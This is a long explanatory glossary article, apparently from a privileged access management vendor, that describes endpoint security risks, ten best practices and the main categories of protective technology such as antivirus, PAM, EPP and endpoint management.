What Endpoint Security Is & Why It's Needed

Endpoint security refers to the strategies and technologies for preventing, containing, mitigating, and remediating threats to endpoints. Threats to endpoints can come in the form of external attacks as well as insider threats, which may be either malicious or unintentional in nature. A compromised endpoint can give an attacker a foothold within an environment, enabling them to launch further attacks on systems to access data and compromise additional endpoints via lateral movement.

Whereas endpoint security for individual consumers is almost entirely focused on technologies like anti-virus deployed on the device, enterprise strategies like hardening, privilege separation, least privilege, etc. rely heavily on centralized management across the corporate network to administer patches, configuration changes, deploy policy updates, gather logs, and more.

Since a corporate IT network is essentially a linkage of endpoints, endpoint integrity and security may be prioritized before implementing security at the network layer. Many IT security solutions provide capabilities that cover multiple security categories across endpoint, network, data, and identity-based models

In this glossary post, we will explore endpoint security, including the challenge of managing and securing endpoints, some of the key endpoint attack vectors, and the strategies, technologies, and solutions for implementing endpoint security.

What is an Endpoint?

An endpoint itself can be defined as any device or hardware—virtual or physical—that connects to the corporate environment, has a TCP/IP (v4 or v6) address, or uses another protocol for networking (wired or wireless). An endpoint can be anything from end-user devices, such as desktops, laptops, tablets, and smartphones to servers, medical devices, IoT devices and sensors, industrial control systems (ICS), point-of-sale (PoS) devices, ATMs, printers, network switches, routers, and much more.

Endpoint security strategies and solutions aim to protect endpoints whether they are connected to the network, or have transient interconnectivity. After all, an endpoint that has no network connection or removable media access still has the risk of the user in front of the terminal itself. Endpoint security software may be centrally managed via a zero trust agentless technology, only installed as client or agent on individual endpoints, be cloud-based, or involve a combination of those implementations

Endpoint security is one of the broadest categories of cybersecurity, overlapping, integrating with, and complementing other important areas, such as network security, data security, identity-based security, and application security. The diversity of endpoint security solutions reflects the growing diversity of endpoints themselves. While some endpoint security and management technologies can be applied across a broad range of endpoints—perhaps even all the devices in a corporate environment—some technologies are device or platform-specific (Windows, macOS, Unix, Linux, Android, Azure, AWS, Google Cloud etc.). These represent unique challenges for monitoring, managing, detecting, and responding to modern threats.

The Differences Between Rules-Based, Signature-based, and Behavioral-based Security

Endpoint security technologies often leverage the following three approaches to detect, prevent, and/or mitigate threats:

Pattern matching and signature-based: (i.e. traditional antivirus, vulnerability management, etc.): This entails relying on threat signatures to block known threats, and/or heuristics to block suspicious code or actions that shares similarities with known threats.

Rules-based and enforcement of advanced policies (i.e. privileged access management, endpoint firewalls, encryption, etc.): This entails applying rules and policies that enforce security best practices, such as least privilege, block lists and allow lists, endpoint firewall rules, and more. The results are highly predictable based on rule matching processing.

Behavior-based (endpoint detection and response, etc.): Modern endpoint security solutions may apply advanced behavioral analysis, machine learning, and even some forms of artificial intelligence to identify threats or inappropriate access. These solutions can process information locally or rely on management servers to aggregate information for advanced detection and response.

Endpoint security strategies themselves encompasses such practices as endpoint hardening, endpoint isolation, endpoint lifecycle and policy management, and more. These are typically signature and rule-based.

Challenges in Securing Endpoints

Evolving cyberthreats, increasingly complex and diverse endpoint environments, corporate misalignment of security technologies to threats, and an ever-more stretched IT team are just some of the many colliding factors that put an organization’s universe of endpoints at risk, and potentially jeopardize the entire network. On top of this, many of the technologies deployed as part of an endpoint security strategy may provide overlapping capabilities in some areas, while gaps remain in others. Overlapping features may also cause incompatibility issues and produce unpredictable results, or negatively impact endpoint stability.

Let’s explore some of the most significant challenges and weaknesses present with enterprise endpoints:

Lack of visibility into the endpoint estate. Most organizations struggle to understand the scope of their endpoint estate, let alone how to manage it. An organization may have millions of endpoints, and even tens of thousands of undiscovered or unknown endpoints that connect to the network. The inability to know the health of all of these endpoints and govern the activities performed on them presents a high risk for the network.

Overwhelming number and diversity of endpoints: The sheer number and diversity of endpoints within any corporate environment today presents massive challenges and makes it hard to standardize security. Non-traditional endpoints proliferate. IoT devices, such as sensors, security cameras, healthcare devices, etc. are now commonplace. Many IT teams struggle to discover and securely onboard legitimate devices at scale. Compounding this issue, many IoT and edge computing devices commonly have severe security drawbacks, such as hardcoded, credentials and the inability to harden software or update firmware. They may use unsafe, or uncommon protocols, and even have built-in backdoors. Because most IoT devices have little computing power, they most likely cannot run security software or host an agent. Over the last decade, sophisticated attacks, such as Stuxnet, waged on industrial control systems (ICS) has been a growing concern. ICS endpoints were traditionally “air-gapped”, meaning they were kept separate from internet-facing networks. However, these critical infrastructure endpoints are, like everything, becoming increasingly connected, and thus, exposed to cyber risk. ICS endpoints can include programmable logic controllers (PLCs), supervisory control and data acquisition (SCADA) systems remote terminal units (RTUs), intelligent electronic devices (IEDs), human machine interfaces (HMI), and much more. The rise of the virtual desktop is another challenge. Virtual desktops share many of the endpoint security risks as physical desktops, but they add further complexity to the environment due to their dynamic and ephemeral nature. And, of course, IT still has desktops (and users), servers, smartphones, network devices, and all the other traditional endpoints (and the accompanying software, applications, etc.) to contend with as well.

Threat actors continue to learn new tricks and acquire more sophisticated tools with powerful automation capabilities. Modern attackers can easily scale attacks across tens of thousands of endpoints and target across organizations, types of devices, and many other ways. Attackers can readily acquire toolkits off the dark web, with nation-state caliber tools. These tools can be anything from credential hacking tools and password dictionaries, to advanced, polymorphic malware that incorporates machine learning. In addition, malware—be it viruses, trojans, ransomware, spyware, etc., is ever-improving at evading antivirus and other security defenses, and blending in with normal processes. Even phishing, particularly spear phishing, attacks are getting more savvy. Spear phishers may be able to instantly scan many resources and even incorporate machine learning to craft phishing messages that apply context to their target with eerie precision. While the vectors used by threat actors are too broad to cover here, one worth mentioning is Living of the Land (LotL) attacks, which refers to the leveraging of tools or features that preexist within the target’s environment. These are typically fileless attacks because no execution of files (i.e. malware) is needed to perform their illicit activities. LotL attacks essentially turn a system's own native applications and commands against itself. Because these attacks leverage legitimate and authorized tools, that are likely allowed by IT and that pre-exist in the system, they are very difficult to detect and stop. Tools commonly exploited for fileless attacks are administrative and troubleshooting tools such as PowerShell scripts, VB scripts, WMI, and PsExec., and Windows script host executables. Finally, another potential threat that has lurked on endpoints for decades, but gets little attention today, is spyware. While this unwanted software is often merely an annoyance, it can compromise privacy, leak data, and potentially perform other malicious actions. Finally, another potential threat that has lurked on endpoints for decades, but gets little attention today, is spyware. While this unwanted software is often merely an annoyance, it can compromise privacy, leak data, and potentially perform other malicious actions.

Overprovisioning of privileges/privileged access: Endpoints typically have far more privileged access than absolutely necessary. Additionally, applications, operating systems, and other software all tend to have default system privileges that provide more capabilities and access rights than is safe or typically needed for daily operations.

Often, the privileged access rights are persistent (also called “standing privileges”), meaning they are constantly in an active state, ready to be used, or exploited. Each instance of excessive privilege opens up the endpoints and, by extension, the enterprise, to a privilege-based attack. With privileged access, malware or an attacker can execute malicious code to gain a foothold. A threat actor may be able to use available privileges again to perform malicious actions on the compromised endpoint, or even to move laterally to other endpoints in the corporate network, compromising more sensitive assets along the way. According to research published by IBM, 70% of attacks involve attempts to move laterally. Almost every single cyberattack today—whether to gain initial access, or to move about once on the inside—involves the use of privileged access, so managing privileged access is critical to endpoint security. Different types of endpoints, applications, software, and users (human and machine) each have unique implications with regard to privileged access, and it must be managed. For instance, default privileges are created and managed differently across different operating systems. Here are a few examples:

  • In Windows systems, the Administrator account holds superuser privileges. Only the System Account built into the operating system is more powerful. Each Windows computer has at least one local administrator account with rights that typically far exceed what is needed, translating into a bloated threat surface. Administrative rights should be removed from most non-IT users as a best practice so the typical user only has standard account rights. Some endpoints should be configured with only guest account access, which generally limits rights even further, to just basic application access and internet browsing.
  • In Linux and Unix-like systems, the superuser account, called ‘root’, is virtually omnipotent over the system, with unrestricted access to all commands, files, directories, and resources. Organizations should eliminate root access and put tight security controls and session auditing around any superuser access. The sudo (“superuser do”) command, which allows the user to temporarily elevate privileges to root-level, but without having direct access to the root account and password, may suffice in some instances, but introduces its own security and management limitations.
  • For macOS endpoints, IT may need to create non-privileged accounts for users (standard users), and manage the local administrator account.

Endpoint Vulnerabilities: While reputable commercial vendors (such as Microsoft with its monthly Patch Tuesday updates) regularly release vulnerability fixes (called patches) for their software, applications, and firmware, vulnerabilities represents one of the largest exposures organizations have that can potentially be exploited by malware, threat actors, and insiders. Even if an organization has a world-class patching and vulnerability management program, almost any mid-to-large sized organizations will have thousands of software vulnerabilities strewn across its fleet of endpoints due to the infeasibility of remediation. Fixing a vulnerability on an endpoint, as with any system update, is not a riskless activity itself and may cause downtime or create other problems, so the risks and benefits must be closely assessed. Indeed, many vulnerabilities are known and present across an enterprise for many years. Of course, the risk is heightened when there is a known exploit targeting a vulnerability. According to a Ponemon/Morphisec Study, it takes organizations, on average, 97 days to apply, test, and fully deploy patches. Here are the three main types of software vulnerabilities found on endpoints:

  • Firmware vulnerabilities: Firmware is the code/software that is built into a specific hardware and enables operation of basic device-level functions. On some devices, firmware is loosely considered the device’s operating system. Some examples include iOS for Apple iPhones. With the proliferation of devices, such as IoT and smartphones, firmware vulnerabilities have become a much greater concern in recent years. However, firmware vulnerabilities with massive security ramifications can also arise in mature vendor products. Because they enable operation of basic functions, firmware vulnerabilities can be exceedingly dangerous, essentially giving a threat actor root access to a device and/or completely undermining security features like encryption.
  • Operating system (OS) vulnerabilities: These can be errors or bugs in code or actual features, such as permitting certain types of unnecessary access, that may pose risk. Common operating systems found in enterprise environments include Windows, macOS, Unix, and Linux.
  • Application vulnerabilities are bugs or weaknesses in installed applications. Vulnerabilities could include anything from a privilege application vulnerability, to backdoor root access, to embedded default credentials. Unlike with firmware and OS systems, end users often have the necessary privileges to install applications. Without the vetting of IT, these self-provisioned applications (known as shadow IT) pose an elevated risk to introduce vulnerabilities or other security risks.

Deficiencies in native OS security and toolsets. While Windows has mature toolsets built into the OS, and Linux has some advanced auditing capabilities, MacOS systems have been laggards for endpoint security, management, and monitoring. Yet, as mature as Windows is, many of the toolsets can only be considered basic, and fall far short of the security needed within enterprise environments. For example, while Windows BitLocker encryption, is often an important part of an enterprise’s endpoint security strategy, other security components, such as Windows Defender Antivirus, Windows Firewall (called Windows Defender Firewall in Windows 10), Local Administrator Password Solution (LAPS), etc. provide only basic protections, and are often disabled entirely within enterprises, which opt for more robust enterprise-class solutions from security vendors. Another example is sudo, which is a program on Unix and Linux systems to elevate privileges, without being given root access. Sudo certainly helps mitigate threats given no alternative, however, sudo itself has many limitations and introduces its own security risks —it falls far short of the enterprise-class privileged access security needed for these environments.

Shadow IT refers broadly to any IT technology within a corporate environment that is not provisioned by IT. It can either be installed on the endpoint itself, or accessed via the cloud, or even be an unauthorized device connected to the network. When end users self-provision applications or connect unauthorized endpoints to the network, it can introduce a number of security and operational issues. A shadow IT application may be incompatible or interfere with other network systems, suffer from dangerous vulnerabilities, have excessive privileges, and may even introduce a backdoor. Controlling shadow IT has been a decade-long IT challenge. During the early months of the coronavirus pandemic and the mass shift to remote work, shadow IT spiked as users tried equip themselves with tools that could help them maintain productivity outside the walls of the corporate office. In some cases, this included insecure remote access and teleconferencing tools, some of which were quickly exploited by attackers, with devasting results.

Insider Threats: Insiders (employees, vendors, contractors, etc.) have always presented one of the most significant risks to corporate endpoints and networks since they already have access on the endpoint and tend to fly under the radar of many traditional threat detection solutions. For instance, an employee could be induced to download corrupted content from within a spam or phishing email, or perhaps to visit a malicious website that initiates a drive by download of malware. If the insider is ill-bent and possesses superuser rights or is otherwise over-provisioned with privileges, they can easily inflict catastrophic damage. Insider threats, when they happen, tend to be the most harmful. The 2019 Human Factor Report by Proofpoint found that more than 99% of threats observed required human interaction to infect user devices.

Immature password lifecycle management and authentication: Endpoints – whether they be desktops, servers, mobile, devices, IoT—almost always have credentials. Many of these credentials are privileged, which means they allow the user (human or machine) to perform powerful functionalities or give them sensitive device or application access. According to Forrester Research, over 80% of breaches today involve privileged credentials. Verizon’s 2020 Data Breach Investigations Report (DBIR) found that threat actors are increasingly prioritizing acquisition of credentials over deployment of malware—and why not—because with the right credentials, they immediately get access to the network. Unfortunately, poor, incomplete password management practices are commonplace within enterprise environments. Here are just a few:

  • Credentials are manually managed, resulting in poor practices, such as lack of password complexity and length, password reuse, etc. Low password complexity and length makes it easier for automated cracking tools to guess the correct password. Password reuse is tremendously risk because if a duplicated password is compromised/stolen in one instance, thos stolen credentials can potentially be used to compromise all the other endpoints that share the same credentials. When employees use the same passwords for their personal endpoints and applications (which generally have lower levels of security than their corporate counterparts), it poses a considerable risk to the corporate environment, if those credentials are reused.
  • Default and hardcoded passwords may be present in IoT, legacy applications, and various networked devices. Attackers can also find these embedded within compiled code, using tools even when developers try to obfuscate them. Also, since the same passwords may be used across many of the same types of devices to help simplify set up at scale, this risk is tantamount to that of reused passwords. Once a class of device’s passwords are known, that information can be used to compromise similar devices—either at the same company, or across all the companies that deploy those devices and did not change the default implementation.
  • Credentials are often shared between users, particularly to perform IT administration tasks. This not only increases risk of password exposure, it also makes it almost impossible to trace all activity occurring on an endpoint (i.e. a server) to a single user, which is a requirement for different compliance and audit initiatives.

Inadequate encryption: Encryption cracking tools are getting increasingly powerful. Yesterday’s encryption standards can’t always withstand modern attacks. Of course, sometimes endpoints lack proper encryption altogether, meaning the data can be easily read and compromised should an unauthorized user or threat actor gain access.

Lost or stolen endpoints: In the years of mainframes and desktop computing devices, stolen devices were a rarity. However, once devices went mobile, the number of lost or stolen enterprise devices soon skyrocketed. Stolen or lost laptops, smartphones, and other devices can create security and compliance risk, especially if the information or access provided by the device is sensitive. The potential for security, legal, and brand fallout increases substantially if the device was not properly maintained for security flaws such as lack of adequate password protection or encryption.

Insecure remote access pathways: An increasingly mobile workforce, and the largescale shift to work from home during the coronavirus pandemic, means endpoints are often outside the network perimeter and connecting remotely via home networks and unmanaged WiFi. While RDP, VNC, and SSH protocols can provide basic remote access, they suffer from serious operational and security limitations when extended for many common use cases, including for home offices. RDP in itself is insecure and organizations using it should wrap additional security and connectivity solutions around it to ensure remote access sessions are not exposed. In addition, VPNs should never be used on an employee’s personal devices (BYOD) for connecting to corporate networks. Vendor endpoints and internal endpoints that need to perform privileged access remotely require more robust technologies. VPNs can’t granularly control, monitor, or report on privileged access; only access in general. Another security issue is that attackers often plant remote access technologies on targeted endpoints (such as a vendor or IT service provider support systems). The attackers then leverage the remote access on those devices as a jumping off point for attacks on the vendor/IT service provider’s customers. Almost all cyberattacks leverage remote access as a vector, so it’s a critical security piece to get right.

The use of personal devices (BYOD) for work introduces risks and challenges. A personal device may lack many of the endpoint security protections and hardening that are applied to corporate-provisioned devices. It’s also possible that family members or housemates share the device and have accounts on it too. Any of these users’ activities could potentially imperil the corporate network. BYOD and VPN should never mix, yet, organizations frequently allow protocol tunneling via these methods. Another complication that occurs with BYOD is what to do when a device is lost or stolen. While it may be in the company’s best interest to initiate an immediate remote data wipe, the employee may object due to the potential loss of content with high personal value, such as family pictures or videos.

Vendor access/vendor endpoints represents perhaps the weakest cybersecurity link for most organizations. According to research published by Opus & Ponemon, the average organization shares confidential and sensitive information with approximately 583 third parties. Threat research published by BeyondTrust found that organizations, have, on average, 182 vendors logging into their systems every week. That adds up to a lot of potential security “weakest links!” The Opus/Ponemon report found that 59% of companies incurred a breach due to a vendor, while the BeyondTrust report put that number at 58%. Why are so many organizations incurring breaches as a result of vendor endpoints and access? VPNs and many other commonly used technologies don’t provide the granular access controls needed. Many organizations simply lack visibility into all the vendor endpoints accessing their systems, let alone, what is occurring during the sessions, whether connecting remotely or on-premise. Do the vendor’s own endpoint security standards meet those of your enterprise? How do you enforce and validate that? Do some of a vendor’s employees use personal devices to access your network? What happens if these employees are terminated or leave—could their access remain as an orphan account? The vendor endpoint security risks are massive, but since vendors play such an important role, getting the security piece correct is imperative for every organization.

Misconfigured endpoints: Poor endpoint configurations can not only hamper operations, but also introduce device, operating system, and application vectors that make it easy for an attacker or piece of malware to access data or assert control over resources. Examples of misconfigurations or poor settings could involve open ports, outdated exceptions, insecure protocols allowed, etc. This is the basis for hardening guidelines that should be implemented and verified on every endpoint.

10 Best Practices for Endpoint Security

No single strategy or technology is by itself sufficient to protect your entire, heterogeneous endpoint universe from all threats. Some strategies (i.e. endpoint hardening) and technologies (privilege management), may be effective security controls against the vast majority of threats on any type of endpoint. Other strategies (i.e. remote wiping, anti-theft protection, etc.) and technologies (i.e. antivirus) may only work, or be applicable, for specific types of endpoints. The following endpoint security best practices should be adopted by every enterprise:

1. Define, Communicate, & Consistently Apply Your Endpoint Security Policy: Your endpoint security policy is a living, evolving document that should be part of your overarching IT security policy. It should programmatically define best practices and how they should be applied. The policy should define strategies, technologies, and data ownership. For instance, if your organization allows BYOD, the policy should clearly define what data is owned by the company, and what data belongs to the end user, and what should happen in case of a lost or stolen device. Any BYOD used for corporate access should also have some form of mobile device management installed to separate personal and corporate resources, and provided other security functionalities. Your policy should also establish what security controls you will put around vendor access, and which security controls you expect the vendor to implement around their own endpoints. Finally, ensure there is a method in place to measure, test, and audit all of these policies to ensure they are functioning as desired.

2. Discover and onboard, or deny access to, endpoints: The next step is the continuous one of finding and inventorying all the various endpoints that connect to your network and onboard them. This also implies applying your organization’s security policies to the endpoints after they are discovered. In some cases, this step will occur proactively, such as when IT is specifically provisioning a device for a user or deploying a server. In other cases, this will occur reactively, such as when a new, unknown device touches the network. Devices should also be properly registered and monitored for issues, necessary updates, and to reconfirm overall health status. And if a device is identified that should not be present, policies, procedures, and automation allow for its disconnection, or that it be on a guest network or segmented in another way that protects the rest of your network and endpoints.

3. Endpoint hardening, which is really a subset of actions aligned with the principle of least privilege (PoLP)— is described below—involves removing or disabling unnecessary programs, access, embedded or other features to condense the attack surface. It is a continuous process performed throughout the lifecycle of technology—from initial installation, through configuration, maintenance, and support, to end-of-life decommissioning. Endpoint hardening practices vary by endpoint, with more complex and powerful endpoints generally requiring more steps. Endpoints should always be hardened before being connected to the internet or corporate networks. Application and Operating System hardening are two of the most important aspects of endpoint hardening. OS hardening can entail removing unnecessary drivers, file sharing, libraries, software, services, and functionality; encrypting local storage; tightening registry and other systems permissions; and implement privileged user controls. Application hardening can entail restricting app-to-app communications, removing or turning off unneeded features, eliminating embedded credentials and replacing them with API calls, etc.

4. Enforce Least Privilege across all your endpoints. This means restricting access rights and permissions to the lowest level required for endpoints, the processes, software, and applications that run on them, and the users that use them. Privileged accounts and access should be outright eliminated wherever possible. Holistically enforcing least privilege—from desktops to servers to IoT, and across users, applications, software, etc.—is one of the most surefire and fundamental security protections organizations can implement to minimize their risk surface and threat windows, while helping ensure optimal endpoint performance. Because of the immense potential for destruction, if misused or abused, inherent to superuser/IT admin privileges—particularly Administrator, Domain Admin, or Root—these users should only be able to log into privileged accounts when absolutely necessary, and only for the finite moments (known as just-in-time access) that privileged access is required. The risk-reduction potential of least privilege is well established. The Microsoft Vulnerability Report 2020 found that eliminating local admin rights (removing privileges) on endpoints alone would have mitigated 83% of Critical Microsoft vulnerabilities over a 5-year period. BeyondTrust CTO/CISO Morey Haber published vulnerability research showing similar reductions could also be achieved by enforcing least privilege across third-party applications, including Oracle, Google, Adobe, VMware, Cisco, etc. Since most malware, including ransomware, needs privilege to execute, least privilege can prevent attacks from compromising an endpoint in the first place. In instances where an endpoint has already been successfully breached (i.e. such as via stolen credentials), malware and attackers (including insiders) typically need privileges access to move around the environment, known as lateral movement. Reducing privilege to the minimum level means that, even if attackers gain a foothold, they are essentially marooned, and the attack is contained. Moreover, by enforcing just-in-time privileged access—which is done by triggering access when certain parameters within a context are met—you limit the duration that privileges are actually available for use and exploit, condensing the threat window. The ability for least privilege to work across three dimensions—preventing attacks from landing & executing, limiting & preventing movement, and restricting privilege availability based on time, makes least privilege arguably the most important and powerful security best practice. Least privilege can protect against both known and unknown threats, whether they originate internally or externally.

5. Apply encryption to protect data stored on the device and in transit. To minimize the risk of data leaks, the strength of encryption should at least meet, and potentially exceed, that which is required by any applicable regulatory standards. More sensitive data (for instance, health data or superuser credentials), may necessitate higher levels of encryption than less sensitive data. A benefit of encryption is that, even if a device is stolen or an email is intercepted, if robust encryption is in place, the data will be unreadable and, therefore, unusable. Under many regulatory and compliance initiatives, including the HIPAA Breach Notification Rule, the theft or loss of adequately encrypted computing or storage devices is not considered a reportable data breach.

6. Identify, prioritize, and remediate vulnerabilities: A fundamental piece of endpoint security is to assess for known vulnerabilities, such as Common Vulnerabilities and Exposures (CVE), against the operating system, firmware, custom software, commercial applications, etc., running on your endpoints. Your organization should have a mature patch management program and a strong policy that dictates desired software configurations and how any changes should occur, if needed. Also ensure devices are running supported versions of firmware, software, applications, etc. In some cases, risk-benefit analysis may dictate no remediation action be taken. This is often the case where a vulnerability may have a low risk, but the fix for it may cause disruption across many endpoints, or it may potentially impact mission-critical systems operations. Remediating vulnerabilities could entail applying a patch, performing a configuration change, eliminating embedded or default credentials, etc. Many regulations and security frameworks, including NIST, PCI DSS, and HIPAA, emphasize vulnerability management as it is one of the most fundamental of all IT security areas. Aside from patch management, vulnerability management may also involve pen testing and threat hunting. Pen testing typically involves third-party security professionals and tools probing for vulnerabilities across your endpoints that can be exploited. In the absence of aa working exploit, a vulnerability by itself is just a theoretical risk. However, once an expoit has been architected for a vulnerability, it becomes a threat. Threat hunting is the process of proactively seeking out threats by looking for indicators of compromise (IoCs), with the basic assumption that an attack has already occurred and a threat actor is active in your environment.

7. Implement threat detection, prevention, and mitigation. Many viruses, ransomware, and other malware threats are already known and documented. This knowledge should be applied (such as via an antivirus/antimalware solution) to ensure these threats are blocked or quarantined, and they are removed or immediately mitigated if found on an endpoint. While implementing signature-based threat protection might only protect your environment against up to 40% of malware threats, it is an important line of defense as part of a multi-layered cyber defense strategy, and a requirement for all regulatory compliance mandates.

8. Protect devices from physical threats, such as by implementing anti-theft technology on the devices (i.e. smartphones) themselves, enabling GPS location awareness, providing security cables for laptops, and restricting physical access to where the devices are used or stored. For instance, you may want to ensure laptops are locked in a secure cabinet in an area that is under constant human and/or video surveillance, or they are never left unattended in a car.

9. Secure vendor endpoints and remote access: Organizations should ideally strive to achieve the same security best practices they uphold within their perimeter beyond their perimeter as well. Where endpoints and identities are concerned, this means ensuring only the right identity on the right endpoint (which has been properly hardened) has access to the right resources, and within the right context. To ensure the right identity is doing the right things with the vendor account/endpoint, you need to apply basic identity management and privileged identity controls such as enforcing least privilege, rotating passwords, multi factor authentication and one-time passwords (OTPs) to limit damage of stolen credentials. Session management and monitoring should also be layered on to audit and control all vendor/remote access-initiated session activity occurring across the organization’s endpoints.

10. Integrate your endpoint security technologies with each other and across the rest of your security and IT stack. The better your endpoint security solutions integrate and communicate with the rest of your tools, the more informed your picture of risk and the more rapidly you can orchestrate a pinpoint response to prevent, mitigate, or remediate attacks. One of the first questions you should ask whenever evaluating a new endpoint security tool is—how does it integrate with the rest of my security ecosystem? Does it create synergies, or does it create more complexity and administration issues? Any new tool/solutions should naturally fit within, and become an integrated part of, your IT and IS environment.

The Benefits of Endpoint Security

With the right mix of strategies and technologies tailored to their environment, organizations can maximize protection against endpoints, support high levels of operational performance and end-user productivity, and comply with requisite regulations. Here are some key benefits of endpoint security:

  • Improves security: This is the most obvious benefit. Enforcing least privilege and managing vulnerabilities drastically reduces the threat surface. Applying JIT access controls and condenses threat windows. Employing signature-based tools keeps endpoints safe from known threats. All of these layered tools and strategies drive down the risk of security incidents and data breaches that may arise from external or internal threats.
  • Enhances endpoint performance: Eliminating superfluous privileges and hardening devices (e.g. removing unnecessary components, blocking unnecessary processes) translates into fewer misconfigurations, incompatibilities, security incidents, and other issues that may cause disruption. Preventing malware infection or endpoint compromise by an unauthorized user also protects against endpoint instability.
  • Simplifies compliance and auditability: Restricting features in accordance with least privilege reduces complexity of the universe of enterprise endpoints, greatly simplifying the path to compliance. Implementing security controls like session monitoring and management and vulnerability assessments may also provide instant visibility and reporting necessary for compliance efforts. The more tightly an endpoint system is integrated, and the better the visibility across the endpoint universe, the more straightforward the path to compliance.
  • Enables the enterprise: A strong endpoint cybersecurity posture enables the enterprise in a number of ways. The right security tools can allow IT to securely enable more types of endpoints, heterogeneous infrastructure, and confidently pursue business-enabling changes to the environment, including the roll-out of new technologies. For instance, organizations that already had a robust endpoint security deployment were well-prepared for the seismic shift to remote work during the early days of coronavirus. Increasingly, cybersecurity posture is also assessed before entering a partnership with another company. Cybersecurity posture is also evaluated for companies undergoing the acquisition process, as acquiring companies are increasingly sensitive to negative security surprises that may have inherent incompatibilities with system integration, have a high cost to rectify, or may involve regulatory fines or remuneration payments to impacted parties.

Top Endpoint Security Technologies

According to a 2020 Ponemon/Morphisec Study, 68% of organizations have experienced one or more endpoint attacks that have successfully compromised data assets and/or IT infrastructure over the last two years. Moreover, anti-virus / anti-malware solutions reportedly miss an average of 60 percent of attacks, Of the attacks that compromised an endpoints, 80%characterize the attack as a zero day (for which signature-based antivirus/anti-malware is ineffective), but 17% say it was known, and 3% are unsure.

While traditional AV/anti-malware remains an important security layer, it is just one layer that helps create a holistic, multi-layered endpoint security approach. Together, your endpoint security solutions should protect against both internal and external threats, whether on-prem, connecting remotely, physical, virtual, or in the cloud.

Here are the core endpoint security solutions, ordered by priority:

Antivirus / antimalware are perhaps the most traditional and well-recognized forms of endpoint protection. AV / antimalware typically works by scanning traffic to a device and/or the device’s content for patterns that match a database of virus signatures. While many IT thought leaders have touted the demise of AV, it remains widely deployed. Basic antivirus software provides detection and protection against known threat signatures. Today, most AV and anti-malware solutions have evolved to incorporate some advanced protection methodologies that incorporate heuristics, behavioral analysis, and even machine learning. Enterprise AV / antimalware solutions are typically installed on a wide array of devices, including servers, desktops and laptops, gateways, and more. These solutions, which may include “next-generation AV”, are centrally managed from the corporate network in most instances. Some devices, such as smartphones, require specialized AV solutions that work at the device-level only. However, one limitation with AV is that many types of endpoints, such as IoT, lack the computing necessary to install and run AV, though cloud-based AV deployments may be of some use in these cases. Other well-known drawbacks of solutions in this class include a hit to device or network performance when the solution is running, a high number of missed threats, and a large number of false positives and security alerts that hinder IT’s ability to respond to what is important. ‘Next-generation’ solutions tend to avoid some of these issues by leveraging cloud processing and foregoing the use of bloated agents. Some solutions also include sandboxing capabilities, which allow for quarantine of an unknown/suspicious program and running it in isolation to see if malicious characteristics present themselves.

Privileged Access Management (PAM) solutions manage privileges/privileged access for users (human and machine), endpoints, systems, applications, processes, etc. PAM solutions also monitor, manage, and record activity occurring during privileged sessions. While there are many point solutions in this space, complete PAM platforms are comprised of the following three functional areas:

  • Privileged Credential/Password Management, also called Privileged Account & Session Management (PASM), solutions enable automated discovery and onboarding of all privileged accounts, secure access to privileged credentials and secrets for humans and machines, and auditing of all privileged activities. Privilege credential management solutions also eliminate embedded passwords in IoT, applications, DevOps tools, etc. and replace them with API calls, or in the case of DevOps and CI/CD toolsets, implement dynamic secrets. Session monitoring and management capabilities empower organizations to audit all activity and home in on and pause or terminate suspicious sessions. By enforcing password security best practices across all types of credentials (passwords, secrets, SSH keys, etc.), privileged credential management solutions eliminate or mitigate threats such as password reuse, pass-the-hash (PtH), and stolen credentials. They also create unique and complex passwords able to withstand automated cracking tools, and that are never revealed to the end user.
  • Endpoint Privilege Management, also called Privilege Elevation & Delegation (PEDM), solutions combine least privilege management and advanced application control capabilities to condense the endpoint attack surface, eliminate unwanted lateral movement, and minimize threat windows by applying just-in-time access models. Endpoint privilege management can be applied to Windows, Mac, Unix, Linux systems, network devices, IoT, and more. These solutions remove admin rights from end-users and dynamically elevate access to applications just for the moments needed. Endpoint privilege management solutions are also used to securely elevate applications via powerful rules engines and comprehensive exception handling. Some solutions can also enable passwordless administration, which is the ability to perform administrative functions on an endpoint without the need for privileged or administrator credentials. Endpoint privilege management is a powerful technology that protects endpoints from insiders as well as a range of sophisticated external threats such as, fileless/living off the land (LoTL) attacks, ransomware, zero day attacks, and more. The combination of application control and privilege management can also be used to eliminate, or at least put controls around, shadow IT.
  • Secure Remote Access solutions enable organizations to extend PAM best practices to remote access. These solutions apply least privilege and robust audit controls to all remote access required by employees, vendors, and service desks. With secure remote access PAM solutions in place, users should be able to quickly and securely access any remote endpoints, running any platform, located anywhere. The granular privilege control and specialized security capabilities of this software far transcends that of VPNs, which it often replaces. By integrating with the privileged password management component of PAM solutions, vendor credentials can also be securely managed (rotated, encrypted, etc.) from a centralized vault, and injected when needed so the vendor never sees them. Secure Remote Access PAM solutions also provide granular auditing to make traditionally complex requirements straightforward.

Comprehensive privileged access management solutions deliver powerful threat reduction and risk mitigation across an organization’s entire privilege universe. PAM solutions can be deployed on-prem, in the cloud, or hybrid. They can also a key requirement of any zero trust initiatives.

Endpoint protection platforms (EPP) are generally comprised of a multilayer set of security technologies managed through a centralized console. These solutions aim to protect against multiple threat vectors across an enterprise’s endpoint estate. Many EPPs leverage the cloud to perform analysis, eliminating any processing hit to endpoints. Endpoint protection platforms can be delivered as SaaS and managed remotely, or they can be installed directly on devices with central management software hosted on a server. EPP solutions typically perform scanning of files via an advanced AV/antimalware engine that protects against signature-based attacks and that incorporates behavioral analysis to expand threat protection. EPPs usually incorporate endpoint firewalls that help tightly control network traffic through specific ports on the individual endpoints. Endpoint protection platforms may also incorporate basic application control (whitelisting, blacklisting), sandboxing (executing files in a virtual environment to inspect for malicious behavior before allowing them to run), and machine learning capabilities.

Endpoint management encompasses a range of solutions and processes around managing the lifecycle of endpoints. Endpoint management solutions may be capable of discovering, onboarding/registering, provisioning, updating, monitoring, and troubleshooting of endpoint devices connecting to the enterprise network from a central location. Solutions in this category include mobile device management (MDM), enterprise mobility management (EMM), unified endpoint management (which may integrate a number of capabilities, including MDM, EMM, etc.). While point solutions like MDM, and EMM (which usually includes MDM and other technologies) work across certain types of mobile devices, UEM solutions strive to wrap lifecycle management capabilities around a diverse array of both traditional and emerging devices, including servers, desktops, mobile devices, IoT, and more. Endpoint management solutions play a key role in optimizing device performance, ensuring correct configurations, and establishing a consistent baseline of device hygiene. These solutions also allow for remote management and can even wrap security controls, such as remote data wipe, anti-tampering, and geo-tracking that provide protection in the event a device is lost or stolen.

